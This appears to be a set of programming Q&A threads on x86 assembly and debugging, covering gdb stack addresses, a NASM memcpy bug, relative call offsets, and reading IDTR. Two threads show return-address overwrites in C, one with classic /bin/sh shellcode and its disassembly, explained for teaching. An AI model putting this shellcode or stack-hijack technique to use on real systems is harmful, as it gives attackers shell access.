Seeing data stored on the stack - c

I have the following src:
1 #include<stdio.h>
2
3 int main(void) {
4 int i= 1337; // breakpoint after this value is assigned
!5 return 0;
6 }
In the asm from gdb I get:
!0x00000000004004f1 main+4 movl $0x539,-0x4(%rbp)
And I verified that $0x539 = 1337. How can I see the memory address where the value 1337 is stored? The value of the rbp memory address shows:
rbp 0x00007fffffffeb20
My thought was the rbp register would show the value 0x539, so where would I be able to find that in gdb (what command to use, etc)?
One interesting things I found was in doing:
>>> print i
$16 = 1337
>>> print &i
$17 = (int *) 0x7fffffffeb1c # how is this arrived at?

0x00007fffffffeb20 - 0x4 == 0x7fffffffeb1c
on x86 almost all constants will be addressed as a relative offset from a register. In this case the register is rbp [the frame address], and the relative offset is -4 bytes. i.e. the constant appears prior to the first instruction in main.
x64 addressing modes typically involve one of 3 possibilities:
a zero byte offset from a register address
a signed 8bit offset from a register address
a signed 32bit offset from a register address
(there is a 4th addressing mode, which is to load the value from a register - just for completeness!). In general, a compiler would prefer to emit those modes in the order I have listed them above (because they result in the Op code + an offset which will be either: 0bytes, 1byte, or 4bytes respectively - so the smaller the offset, the smaller the generated machine code will be).

Related

Why my own memcpy written on NASM can not copy more than 340000000 bytes?

I am learning nasm. I have written a simple function that copies memory from the source to the destination. I test in in C.
section .text
global _myMemcpy
_myMemcpy:
mov eax, [esp + 4]
mov ecx, [esp + 8]
add [esp + 12], eax
lp:
mov dl, [ecx]
mov [eax], dl
inc eax
inc ecx
cmp eax, [esp + 12]
jl lp
endlp:
mov eax, [esp + 4]
ret
And the C program:
#include <string.h>
#define Times 340000000
extern void* _myMemcpy(void* dest, void* src, size_t size);
char sr[Times];
char ds[Times];
int main(void)
{
memset(sr, 'a', Times);
_myMemcpy(ds, sr, Times);
return 0;
}
I am currently using Ubuntu OS. When I compile and link the two files with $ nasm -f elf m.asm && gcc -Wall -m32 m.o p.c && ./a.out it works fine when the value of Times is less than 340000000. When it is greater, _myMemcpy copies only the furst byte of the source to the destination. I can't figure out where is the problem. Every suggestion will by useful.
You're doing signed compares on pointers; don't do that. Use jne in this case since you will always reach exact equality at the exit point.
Or if you want relational compares with pointers, usually unsigned conditions like jb and jae make the most sense. (It's normal to think of virtual address space as a flat linear 4GiB with the lowest address being 0, so you need increments across the middle of that range to work).
With arrays larger than your ~300MiB size, and the default linker script for PIE executables, apparently one of them will span the 2GiB boundary between signed-positive and signed-negative1. So the end-pointer you calculate will be "negative" if you treat it as a signed integer. (Unlike on x86-64, where the non-canonical "hole" spanning the middle of virtual address-space means that an array can never span the signed-wraparound boundary: Should pointer comparisons be signed or unsigned in 64-bit x86? - sometimes it does make sense to use signed compares there.)
You should see this with a debugger if you single-step and look at the pointer values, and the memory value you create with size += dest (add [esp + 12], eax). As a signed operation, that overflows to create a negative end_pointer, while the start pointer is still positive. pos < neg is false on the first iteration, so your loop exits, you can see this when single-stepping.
Footnote 1: On my system, under GDB (which disables ASLR), after start to get the executable mapped to Linux's default base address for PIEs (2/3 of the way into the low half of the address space, i.e. 0x5555...), I checked the addresses with your test case:
sr at 0x56559040
ds at 0x6a998d40
end of ds at p /x sizeof(ds) + ds = 0x7edd8a40
So if it were much bigger, it would cross 0x80000000. That's why 340000000 avoids your bug but larger sizes reveal it.
BTW, under a 32-bit kernel, Linux defaults to a 3:1 split of address space between kernel and user-space, so even there it's possible for this to happen. But under a 64-bit kernel, 32-bit processes can have the entire 4 GiB address space to themselves. (Except for a page or two reserved by the kernel: see also Why can't I mmap(MAP_FIXED) the highest virtual page in a 32-bit Linux process on a 64-bit kernel?. That also means that forming a pointer to one-past-end of any array like you're doing (which ISO C promises is valid to do), won't wrap around and will still compare above a pointer into the object.)
This won't happen in 64-bit mode: there's enough address space to just divide it evenly between user and kernel, as well as there being a giant non-canonical hole between high and low ranges.

x86 E8 and FF calls, how to find the E8 shifting address 'on the fly'? basic x86 ASM calls

I'm working here with binary obfuscation, so a got a buffer that is filled with op-codes, and I'm using Linux, so, all function calls uses the same caller/callee conventions and no problem here.
My question is about the E8 opcode, This opcode takes near calls using relative address.
My question is that: I know the address where call comes from, I know the address where I have to call, so, how can I find the shift address that I must put in the E8 call? This is:
signed long src = (signed long)buffer + shift; //get the position where E8 instruction is
signed long dst = (signed long)srand; //get the destination position where i want to call (yes, srand(long) function in this case.)
So in my buffer I have:
buffer[] = "[....]\xE8\xFF\xFA\xFE\x54[.....]"; //example
I need to replace with a valid pointer to srand, how can I get the relative address from what I have?
I just thought that i can use FF instruction to call direct, but I couldn't figure out how to do this. I cant copy the address to (say) $eax because I can't put more op-codes than 5 in the replacement (it will make all jmp calls above go bananas), and I can't understand if there is a way to make a direct call in 5 bytes.
So if somebody know how to get the right value to replace the E8 relative shifting address, or if there is a way to make some sort of direct call keeping the same functional properties as E8 call and just using 5 bytes...
(Before ask, I tried to put FF XX XX XX XX as XX being the real address and it didn;t work, the x86 doesn't looks it like a call, it interpret as a INC (???) and some random thing after. I tried replace in this way:
inline void endian_swap(long& x) {
x = (x>>24) |
((x<<8) & 0x00FF0000) |
((x>>8) & 0x0000FF00) |
(x<<24);
}
endian_swap(dst);
endian_swap(src);
unsigned int p = dst - src;
endian_swap(p);
And put the address that I found to E8 call. It didn't work anyway.
The relative addresses in the near call and jxx/near jmp instructions equals the target address where you want to transfer control minus the address of the instruction immediately following your call or jump instruction. Relative addresses are relative to the address of the next instruction, not the one that's transferring control. IOW, you have to take into account the length of your call or jump instruction if its address operand is relative.
Generally there's no equivalent to a call or jump instruction that's 5 bytes or shorter.
You can simulate jmp as push target address + ret, but in 32-bit mode with arbitrary target addresses you get at least 1+4+1=6 bytes for those 2 instructions. You can simulate call in the same way, but you will have add another push or call instruction to place the return address on the stack. So, to those 6 bytes you add 5 more.
There's an "absolute" version of "jmp" (and IIRC "call" as well) that takes the address operand as an immediate consisting of the target offset and target segment. Such an instruction will be at least 1+4+2=7 bytes long (4 bytes for offset, 2 bytes for segment selector).
If you use a variant of call or jmp that takes the target address from a specified memory location (e.g. call [ebx]), that instruction is going to be at least 1+1=2 bytes long (opcode + ModR/M byte), but you'll have to load a register with the address of that memory location containing the target address and that'll cost you some other 1+4=5 bytes, giving you at least 7 bytes. There's also a variant that allows you to specify the target address in a register (e.g. jmp ebx), but again, because of having to load the register, you come out at at least 7 bytes.
The only way you can make your call/jump instruction shorter is when the target address is very close to the address of that instruction (in which case you can use either a rel16 form (with the appropriate operand or address (I don't remember which one) override prefix) or a rel8 form if available) OR when the target address is small (in which case push target address can be either the shorter push Ib or the shorter operand size prefix + push Iw).
I solved it by doing:
long dst = (long)srand;
long src = ((long)buffer) + shift + 5; //begin of buffer + actual position + this instruction size
long p = dst - src;
p = htonl(p);
Than I replace the call on the buffer and everything works well.

Buffer overflow in C

I'm attempting to write a simple buffer overflow using C on Mac OS X 10.6 64-bit. Here's the concept:
void function() {
char buffer[64];
buffer[offset] += 7; // i'm not sure how large offset needs to be, or if
// 7 is correct.
}
int main() {
int x = 0;
function();
x += 1;
printf("%d\n", x); // the idea is to modify the return address so that
// the x += 1 expression is not executed and 0 gets
// printed
return 0;
}
Here's part of main's assembler dump:
...
0x0000000100000ebe <main+30>: callq 0x100000e30 <function>
0x0000000100000ec3 <main+35>: movl $0x1,-0x8(%rbp)
0x0000000100000eca <main+42>: mov -0x8(%rbp),%esi
0x0000000100000ecd <main+45>: xor %al,%al
0x0000000100000ecf <main+47>: lea 0x56(%rip),%rdi # 0x100000f2c
0x0000000100000ed6 <main+54>: callq 0x100000ef4 <dyld_stub_printf>
...
I want to jump over the movl instruction, which would mean I'd need to increment the return address by 42 - 35 = 7 (correct?). Now I need to know where the return address is stored so I can calculate the correct offset.
I have tried searching for the correct value manually, but either 1 gets printed or I get abort trap – is there maybe some kind of buffer overflow protection going on?
Using an offset of 88 works on my machine. I used Nemo's approach of finding out the return address.
This 32-bit example illustrates how you can figure it out, see below for 64-bit:
#include <stdio.h>
void function() {
char buffer[64];
char *p;
asm("lea 4(%%ebp),%0" : "=r" (p)); // loads address of return address
printf("%d\n", p - buffer); // computes offset
buffer[p - buffer] += 9; // 9 from disassembling main
}
int main() {
volatile int x = 7;
function();
x++;
printf("x = %d\n", x); // prints 7, not 8
}
On my system the offset is 76. That's the 64 bytes of the buffer (remember, the stack grows down, so the start of the buffer is far from the return address) plus whatever other detritus is in between.
Obviously if you are attacking an existing program you can't expect it to compute the answer for you, but I think this illustrates the principle.
(Also, we are lucky that +9 does not carry out into another byte. Otherwise the single byte increment would not set the return address how we expected. This example may break if you get unlucky with the return address within main)
I overlooked the 64-bitness of the original question somehow. The equivalent for x86-64 is 8(%rbp) because pointers are 8 bytes long. In that case my test build happens to produce an offset of 104. In the code above substitute 8(%%rbp) using the double %% to get a single % in the output assembly. This is described in this ABI document. Search for 8(%rbp).
There is a complaint in the comments that 4(%ebp) is just as magic as 76 or any other arbitrary number. In fact the meaning of the register %ebp (also called the "frame pointer") and its relationship to the location of the return address on the stack is standardized. One illustration I quickly Googled is here. That article uses the terminology "base pointer". If you wanted to exploit buffer overflows on other architectures it would require similarly detailed knowledge of the calling conventions of that CPU.
Roddy is right that you need to operate on pointer-sized values.
I would start by reading values in your exploit function (and printing them) rather than writing them. As you crawl past the end of your array, you should start to see values from the stack. Before long you should find the return address and be able to line it up with your disassembler dump.
Disassemble function() and see what it looks like.
Offset needs to be negative positive, maybe 64+8, as it's a 64-bit address. Also, you should do the '+7' on a pointer-sized object, not on a char. Otherwise if the two addresses cross a 256-byte boundary you will have exploited your exploit....
You might try running your code in a debugger, stepping each assembly line at a time, and examining the stack's memory space as well as registers.
I always like to operate on nice data types, like this one:
struct stackframe {
char *sf_bp;
char *sf_return_address;
};
void function() {
/* the following code is dirty. */
char *dummy;
dummy = (char *)&dummy;
struct stackframe *stackframe = dummy + 24; /* try multiples of 4 here. */
/* here starts the beautiful code. */
stackframe->sf_return_address += 7;
}
Using this code, you can easily check with the debugger whether the value in stackframe->sf_return_address matches your expectations.

store itdr on x64

I tried to get idt address in my driver, I made function in asm which returns what idtr contains:
.data
myData dq 0
.code
Function PROC
sidt myData
mov rax, myData
ret
Function ENDP
END
But the address which I get is weird, for example in windbg:
r idtr
idtr=fffff80000b95080
However my driver shows:
idtr = f80000b950800fff
I read that on x64 IDTR contains 64-bit base address of IDT table. I would appreciate if anyone explain why my output is not the same as from WinDbg.
This is what the Intel docs say about the SIDT instruction:
In 64-bit mode, the operand size is fixed at 8+2 bytes. The instruction stores 8-byte base and 2-byte limit values.
and:
DEST[0:15] <- IDTR(Limit);
DEST[16:79] <- IDTR(Base);
This means your myData variable needs to be 10 bytes long, and the instructions stores the limit in the first 2 bytes and base address in the next 8 bytes. This also explains why your value matches with WinDbg's value after the first ffff bytes.

can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //setret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
can anyone give me a better explanation ?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.
2) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
retf
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <stdio.h>
main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This is just spawn /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);

Resources